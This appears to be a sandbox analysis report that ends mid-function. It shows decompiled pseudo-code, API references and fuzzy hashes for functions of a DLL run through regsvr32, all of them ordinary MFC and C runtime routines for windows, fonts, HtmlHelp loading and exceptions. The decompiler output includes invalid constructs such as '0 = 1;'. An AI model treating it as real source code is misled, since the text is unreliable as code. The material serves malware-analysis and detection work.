				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E6DA46A43();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E6DA49881(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E6DA5C5A0(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x2c;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E6DA4054C(_t61, _t72, GetWindowLongA, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf8))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E6DA4067B(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x11c))();
			}

0x6da40740
0x6da40747
0x6da4074d
0x6da40752
0x6da40777
0x6da40777
0x6da4077d
0x6da4077f
0x6da4077f
0x6da4077d
0x6da40782
0x6da40787
0x6da4078b
0x6da4078e
0x6da4078e
0x6da40791
0x6da40799
0x6da4079e
0x6da4079e
0x6da407a1
0x6da407a5
0x6da407a8
0x6da407af
0x6da407b4
0x6da407b6
0x6da407ba
0x6da407c4
0x6da407c9
0x6da407cf
0x6da407d2
0x6da407e3
0x6da407ea
0x6da407ed
0x6da407ed
0x6da407ba
0x6da407b4
0x6da40803
0x6da40805
0x6da40814
0x6da40820
0x6da40824
0x6da4082c
0x6da4082c
0x6da40824
0x6da40834
0x6da40847

APIs

SendMessageA.USER32 ref: 6DA407ED
GetWindowLongA.USER32(?,000000FC), ref: 6DA407FF
GetWindowLongA.USER32(?,000000FC), ref: 6DA40810
SetWindowLongA.USER32 ref: 6DA4082C

Strings

,, xrefs: 6DA407E3

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: ,
API String ID: 2178440468-3772416878
Opcode ID: 27554bdd5f24801bf54e3c64abe1e46db3265bc0c5279742d39b6115fdad789d
Instruction ID: aff7decb83dbc7c57851fcbb0bb2b9f0d68cb1bb49a07715639b840ce5b153ad
Opcode Fuzzy Hash: 27554bdd5f24801bf54e3c64abe1e46db3265bc0c5279742d39b6115fdad789d
Instruction Fuzzy Hash: D5311638608B119FD7109F76CA84A6ABBF4BF84314F15C12CE68297691DB71E480CF99

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4E86F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93
comCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E6DA4E86F(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t52;
				signed int _t63;
				signed int _t67;
				signed int _t70;
				signed int _t84;
				signed int _t90;
				intOrPtr* _t94;
				void* _t95;

				_t90 = __edx;
				_push(0x84);
				E6DA5C876(E6DA6EAFF, __ebx, __edi, __esi);
				_t52 =  *((intOrPtr*)(_t95 + 8));
				_t94 = __ecx;
				 *((intOrPtr*)(_t95 - 0x50)) = 0;
				 *((intOrPtr*)(_t95 - 0x54)) = 0x6da70dbc;
				 *(_t95 - 4) = 0;
				if(_t52 == 0 ||  *(_t52 + 4) == 0) {
					if(E6DA4DCC6(_t95 - 0x54, 0x11) != 0 || E6DA4DCC6(_t95 - 0x54, 0xd) != 0) {
						_t52 = _t95 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t94 + 0x64)) = 0;
					}
				} else {
					L6:
					GetObjectA( *(_t52 + 4), 0x3c, _t95 - 0x4c);
					_push(_t95 - 0x30);
					 *(_t95 - 0x7c) = 0x20;
					E6DA4474C(0, _t95 - 0x5c, 0x6da70dbc, _t94, __eflags);
					 *((intOrPtr*)(_t95 - 0x78)) =  *((intOrPtr*)(_t95 - 0x5c));
					 *((short*)(_t95 - 0x6c)) =  *((intOrPtr*)(_t95 - 0x3c));
					 *(_t95 - 0x6a) =  *(_t95 - 0x35) & 0x000000ff;
					 *(_t95 - 0x68) =  *(_t95 - 0x38) & 0x000000ff;
					 *(_t95 - 0x64) =  *(_t95 - 0x37) & 0x000000ff;
					 *(_t95 - 0x60) =  *(_t95 - 0x36) & 0x000000ff;
					_t63 =  *(_t95 - 0x4c);
					__eflags = _t63;
					 *(_t95 - 4) = 1;
					 *(_t95 - 0x58) = _t63;
					if(__eflags < 0) {
						 *(_t95 - 0x58) =  ~_t63;
					}
					E6DA45554(0, _t95 - 0x90, 0x6da70dbc, _t94, __eflags);
					 *(_t95 - 4) = 2;
					_t84 = GetDeviceCaps( *(_t95 - 0x88), 0x5a);
					_t67 =  *(_t95 - 0x58) * 0xafc80;
					asm("cdq");
					_t90 = _t67 % _t84;
					_t94 = _t94 + 0x64;
					 *((intOrPtr*)(_t95 - 0x70)) = 0;
					 *(_t95 - 0x74) = _t67 / _t84;
					E6DA4A8C3(_t94);
					_t70 = _t95 - 0x7c;
					__imp__#420(_t70, 0x6da79368, _t94,  *((intOrPtr*)(_t94 + 0x20)));
					__eflags = _t70;
					if(__eflags < 0) {
						 *_t94 = 0;
					}
					 *(_t95 - 4) = 1;
					E6DA455A8(0, _t95 - 0x90, 0x6da70dbc, _t94, __eflags);
					__eflags =  *((intOrPtr*)(_t95 - 0x5c)) + 0xfffffff0;
					E6DA21430( *((intOrPtr*)(_t95 - 0x5c)) + 0xfffffff0);
				}
				 *(_t95 - 4) =  *(_t95 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t95 - 0x54)) = 0x6da70dbc;
				E6DA21D20(_t95 - 0x54, _t90);
				return E6DA5C8F9(0, 0x6da70dbc, _t94);
			}

0x6da4e86f
0x6da4e86f
0x6da4e879
0x6da4e87e
0x6da4e888
0x6da4e88a
0x6da4e88d
0x6da4e890
0x6da4e895
0x6da4e8a8
0x6da4e8c0
0x00000000
0x6da4e8b8
0x6da4e8b8
0x6da4e8b8
0x6da4e8c3
0x6da4e8c3
0x6da4e8cc
0x6da4e8d5
0x6da4e8d9
0x6da4e8e0
0x6da4e8e8
0x6da4e8ef
0x6da4e8f8
0x6da4e900
0x6da4e907
0x6da4e90e
0x6da4e911
0x6da4e914
0x6da4e916
0x6da4e91a
0x6da4e91d
0x6da4e921
0x6da4e921
0x6da4e92d
0x6da4e93a
0x6da4e944
0x6da4e949
0x6da4e94f
0x6da4e950
0x6da4e952
0x6da4e956
0x6da4e959
0x6da4e95c
0x6da4e967
0x6da4e96b
0x6da4e971
0x6da4e973
0x6da4e975
0x6da4e975
0x6da4e97d
0x6da4e981
0x6da4e989
0x6da4e98c
0x6da4e98c
0x6da4e991
0x6da4e998
0x6da4e99b
0x6da4e9a5

APIs

__EH_prolog3_GS.LIBCMT ref: 6DA4E879
GetObjectA.GDI32(?,0000003C,?), ref: 6DA4E8CC
GetDeviceCaps.GDI32(?,0000005A), ref: 6DA4E93E
OleCreateFontIndirect.OLEAUT32(00000020,6DA79368), ref: 6DA4E96B

Strings

, xrefs: 6DA4E8D9

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
String ID:
API String ID: 2429671754-3916222277
Opcode ID: cf38f4396d6ed1af51b0cf2813dadd84360f6f9d0edb5e02360b9a8dd0707701
Instruction ID: ee7eab8d6fce811c4df13df0045eee3159e8a03055da92ab1d11ecb4e13075ff
Opcode Fuzzy Hash: cf38f4396d6ed1af51b0cf2813dadd84360f6f9d0edb5e02360b9a8dd0707701
Instruction Fuzzy Hash: 5D416774D09249DECF10CFE5CA40AECFBB0BF19308F20816AE565EB281E7748A85CB11

Uniqueness

Uniqueness Score: -1.00%

Function 6DA3DFE3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6DA3DFE3(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E6DA3DE2E() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E6DA5C758(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x6da855c0(_a4, _a8);
			}

0x6da3dff2
0x6da3e00b
0x6da3e076
0x6da3e076
0x6da3e078
0x00000000
0x6da3e079
0x6da3e00d
0x6da3e014
0x00000000
0x6da3e02d
0x6da3e02e
0x6da3e031
0x6da3e03f
0x6da3e042
0x6da3e04a
0x6da3e04b
0x6da3e04c
0x6da3e04d
0x6da3e054
0x6da3e057
0x6da3e05b
0x6da3e06a
0x6da3e06f
0x6da3e072
0x00000000
0x6da3e072
0x6da3e014
0x00000000

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6DA3E023
GetSystemMetrics.USER32 ref: 6DA3E03B
GetSystemMetrics.USER32 ref: 6DA3E042

Strings

DISPLAY, xrefs: 6DA3E05F
B, xrefs: 6DA3E002

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: 7ba69c1bbdf23187117d80ef6741542320c35828b55ec6504c05204ad3c8928e
Instruction ID: f2aa28ee9e52a7e078e7c14d4bda2848bae42b4d721181412f088aa6337b92c9
Opcode Fuzzy Hash: 7ba69c1bbdf23187117d80ef6741542320c35828b55ec6504c05204ad3c8928e
Instruction Fuzzy Hash: B111B672A48335ABDB215F649C8465B7BA9EF07751B028111ED05EA045D371CD81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6DA477AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DA477AF(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E6DA3E7F0(__ecx, __eflags, _t26) == 0) {
					_t10 = E6DA40F3B(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E6DA3ECE4(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E6DA49DCF(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}

0x6da477af
0x6da477af
0x6da477b6
0x6da477ba
0x6da477c3
0x6da477cc
0x6da477d1
0x6da477d3
0x6da477df
0x6da477df
0x6da477e6
0x6da47841
0x00000000
0x6da47844
0x6da477e8
0x6da477eb
0x6da477ee
0x6da477f5
0x6da477ff
0x6da47801
0x00000000
0x00000000
0x6da4780a
0x6da4780f
0x6da47811
0x00000000
0x00000000
0x6da47818
0x6da4781e
0x6da47820
0x6da4782d
0x6da47839
0x00000000
0x6da47839
0x6da47823
0x6da47829
0x6da4782b
0x00000000
0x00000000
0x00000000
0x6da4782b
0x6da477f0
0x6da477f3
0x00000000
0x00000000
0x00000000
0x6da477f3
0x6da477d5
0x6da477d9
0x00000000
0x00000000
0x00000000
0x6da477db
0x6da477c5
0x00000000

Strings

Edit, xrefs: 6DA47803

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: 23acd46bc35c1e2a7760d6f2c7617645816cf3b11e46cedda13cb2a3991083c2
Instruction ID: 1d90d994ee791fe6757a14a3603422d5b8a92da32d9f2fe4b28782ff9b113740
Opcode Fuzzy Hash: 23acd46bc35c1e2a7760d6f2c7617645816cf3b11e46cedda13cb2a3991083c2
Instruction Fuzzy Hash: A411E539B0C2A2ABEF2016368D04B65B679BF46752F25C435E521D20A1EBE1D8D1C1D4

Uniqueness

Uniqueness Score: -1.00%

Function 6DA41820 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E6DA41820(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E6DA49B8E(0xc);
				_push(E6DA40BEB);
				_t26 = E6DA4A0DA(__ebx, 0x6da85740, __edi, _t25, _t27);
				if(_t26 == 0) {
					E6DA44898(0x6da85740);
				}
				_t29 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E6DA49C00(0xc);
					return  *(_t26 + 8)(_a4, _a8, _a12, _a16);
				} else {
					_push("hhctrl.ocx");
					_t16 = E6DA3F12A(_t21, 0x6da85740, _t24, _t26, _t29);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						 *(_t26 + 8) = _t17;
						__eflags = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}

0x6da41820
0x6da41820
0x6da41820
0x6da41828
0x6da4182d
0x6da4183c
0x6da41840
0x6da41842
0x6da41842
0x6da41847
0x6da4184b
0x6da41885
0x6da41887
0x00000000
0x6da4184d
0x6da4184d
0x6da41852
0x6da41858
0x6da4185d
0x6da41869
0x6da4186f
0x6da41872
0x6da41874
0x00000000
0x00000000
0x6da41879
0x6da4187f
0x6da4187f
0x00000000
0x6da4185f

APIs

Part of subcall function 6DA49B8E: EnterCriticalSection.KERNEL32(6DA85A78,?,?,?,?,6DA4A0F5,00000010,00000008,6DA4987C,6DA4981F,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030), ref: 6DA49BC8
Part of subcall function 6DA49B8E: InitializeCriticalSection.KERNEL32(-6DA858E0,?,?,?,?,6DA4A0F5,00000010,00000008,6DA4987C,6DA4981F,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030), ref: 6DA49BDA
Part of subcall function 6DA49B8E: LeaveCriticalSection.KERNEL32(6DA85A78,?,?,?,?,6DA4A0F5,00000010,00000008,6DA4987C,6DA4981F,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030), ref: 6DA49BE7
Part of subcall function 6DA49B8E: EnterCriticalSection.KERNEL32(-6DA858E0,?,?,?,?,6DA4A0F5,00000010,00000008,6DA4987C,6DA4981F,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030), ref: 6DA49BF7

Part of subcall function 6DA4A0DA: __EH_prolog3_catch.LIBCMT ref: 6DA4A0E1

Part of subcall function 6DA44898: __CxxThrowException@8.LIBCMT ref: 6DA448AE

GetProcAddress.KERNEL32(00000000,HtmlHelpA,6DA40BEB,0000000C), ref: 6DA41869
FreeLibrary.KERNEL32(?), ref: 6DA41879

Strings

HtmlHelpA, xrefs: 6DA41863
hhctrl.ocx, xrefs: 6DA4184D
h4t, xrefs: 6DA41879

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$h4t$hhctrl.ocx
API String ID: 3274081130-4244647860
Opcode ID: 5abc1fc8163340cb908d5d828a0759c74e1c073cc88f2ab7f0f8d9cb627c86f3
Instruction ID: 750d764d21c9d1dd5d5a2c1824a9c2362ce228fdc5fa3824d5e2137d1657fe81
Opcode Fuzzy Hash: 5abc1fc8163340cb908d5d828a0759c74e1c073cc88f2ab7f0f8d9cb627c86f3
Instruction Fuzzy Hash: ED01D13604C707EBC7625FA1CE08F6A3BB5FF45365F01C428FA4A95050EB31D4E08A56

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5E7F7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6DA5E7F7(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				void* _t23;

				_t26 = __esi;
				_t25 = __edi;
				_t24 = __edx;
				_t11 =  *((intOrPtr*)( *_a4));
				if(_t11 == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E6DA5F6C8(_t23, __edx, __edi, __eflags) + 0x90));
					if(__eflags > 0) {
						_t15 = E6DA5F6C8(_t23, __edx, __edi, __eflags) + 0x90;
						 *_t15 =  *_t15 - 1;
						__eflags =  *_t15;
					}
					goto L5;
				} else {
					_t32 = _t11 - 0xe06d7363;
					if(_t11 != 0xe06d7363) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						 *(E6DA5F6C8(_t23, __edx, __edi, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
						_push(8);
						_push(0x6da7ec58);
						E6DA5C918(_t23, __edi, __esi);
						_t19 =  *((intOrPtr*)(E6DA5F6C8(_t23, __edx, _t25, _t32) + 0x78));
						if(_t19 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t19();
							_v8 = 0xfffffffe;
						}
						return E6DA5C95D(E6DA65E3D(_t23, _t24, _t25, _t26));
					}
				}
			}

0x6da5e7f7
0x6da5e7f7
0x6da5e7f7
0x6da5e801
0x6da5e808
0x6da5e827
0x6da5e82e
0x6da5e835
0x6da5e83a
0x6da5e83a
0x6da5e83a
0x00000000
0x6da5e80a
0x6da5e80a
0x6da5e80f
0x6da5e83c
0x6da5e83c
0x6da5e83f
0x6da5e811
0x6da5e816
0x6da5fa0c
0x6da5fa0e
0x6da5fa13
0x6da5fa1d
0x6da5fa22
0x6da5fa24
0x6da5fa28
0x6da5fa33
0x6da5fa33
0x6da5fa44
0x6da5fa44
0x6da5e80f

APIs

__getptd.LIBCMT ref: 6DA5E811

Part of subcall function 6DA5F6C8: __getptd_noexit.LIBCMT ref: 6DA5F6CB
Part of subcall function 6DA5F6C8: __amsg_exit.LIBCMT ref: 6DA5F6D8

__getptd.LIBCMT ref: 6DA5E822
__getptd.LIBCMT ref: 6DA5E830

Strings

csm, xrefs: 6DA5E80A
MOC, xrefs: 6DA5E803

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: fe69f81dd7d11455ee3af9fbdd1ec8c3269137463e198567edbc54769e45a97a
Instruction ID: 92d77e3a1d40b0c7ed68381bc34d633ac7afab49935331bcd3628e51c4a07f74
Opcode Fuzzy Hash: fe69f81dd7d11455ee3af9fbdd1ec8c3269137463e198567edbc54769e45a97a
Instruction Fuzzy Hash: 02E08C3951C2448FD7109B74D548B6933E4FF89318F6A00E6E59CCB232C734E9F08AA2

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4E9A8 Relevance: 7.6, APIs: 5, Instructions: 123
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6DA4E9A8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t51;
				long _t52;
				void* _t66;

				_push(0x14);
				E6DA5C80D(E6DA6EB37, __ebx, __edi, __esi);
				_t51 =  *((intOrPtr*)(_t66 + 0xc)) + 0x2cc;
				if(_t51 > 0xf) {
					L21:
					_t52 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t51 + 0x6da4eb64) & 0x000000ff) * 4 +  &M6DA4EB3C))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							_push(2);
							_pop(__ecx);
							 *__eax = __cx;
							0 = 1;
							goto L3;
						case 1:
							_t55 =  *(_t66 + 0x10);
							_push(0xb);
							_pop(_t59);
							 *_t55 = _t59;
							_t60 = _t59 | 0xffffffff;
							goto L3;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							_push(0xb);
							_pop(__eax);
							 *__esi = __ax;
							__eax = E6DA4F013( *(__ebp + 8));
							__eax =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L4;
						case 3:
							__eax =  *(__ebp + 0x10);
							_push(0xb);
							_pop(__ecx);
							 *__eax = __cx;
							__ecx = 0;
							L3:
							_t55[2] = _t60;
							goto L4;
						case 4:
							__ecx = __ebp + 0xc;
							__eax = E6DA212E0(__ebp + 0xc);
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E6DA3D400(__ebp + 0xc, 0xf1c0);
							goto L19;
						case 5:
							__esi =  *(__ebp + 0x10);
							_push(3);
							_pop(__eax);
							 *__esi = __ax;
							__eax = GetThreadLocale();
							 *(__esi + 8) = __eax;
							goto L4;
						case 6:
							__eflags =  *(__esi + 0x5c) - 0xffffffff;
							if(__eflags == 0) {
								_push( *(__esi + 0x20));
								__ecx = __ebp - 0x20;
								__eax = E6DA45554(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
								 *(__esi + 0x20) = SendMessageA( *( *(__esi + 0x20) + 0x20), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x20) + 0x20));
								 *(__esi + 0x5c) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x60) = __eax;
								__eax = E6DA455A8(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
							}
							__eax =  *(__ebp + 0x10);
							_push(3);
							_pop(__ecx);
							 *__eax = __cx;
							__eflags = __edi - 0xfffffd43;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x60);
							} else {
								__esi =  *(__esi + 0x5c);
							}
							 *(__eax + 8) = __esi;
							goto L4;
						case 7:
							__eflags =  *(__esi + 0x64);
							if(__eflags != 0) {
								L15:
								__edi =  *(__ebp + 0x10);
								_push(9);
								_pop(__eax);
								 *__edi = __ax;
								__eax =  *(__esi + 0x64);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 4))();
								__eax =  *(__esi + 0x64);
								 *(__edi + 8) = __eax;
								goto L4;
							} else {
								__ecx =  *(__esi + 0x20);
								__eax = E6DA222F0( *(__esi + 0x20));
								__ecx = __esi;
								__eax = E6DA4E86F(__ebx, __esi, __edx, __edi, __esi, __eflags, __eax);
								__eflags =  *(__esi + 0x64);
								if( *(__esi + 0x64) == 0) {
									goto L21;
								} else {
									goto L15;
								}
							}
							goto L22;
						case 8:
							__ecx = __ebp + 0xc;
							__eax = E6DA212E0(__ebp + 0xc);
							_t40 = __ebp - 4;
							 *_t40 =  *(__ebp - 4) & 0x00000000;
							__eflags =  *_t40;
							L19:
							__esi =  *(__ebp + 0x10);
							_push(8);
							_pop(__eax);
							__ecx = __ebp + 0xc;
							 *__esi = __ax;
							__eax = E6DA40BD4(__ebx, __ebp + 0xc, __edi, __esi);
							__ecx =  *(__ebp + 0xc);
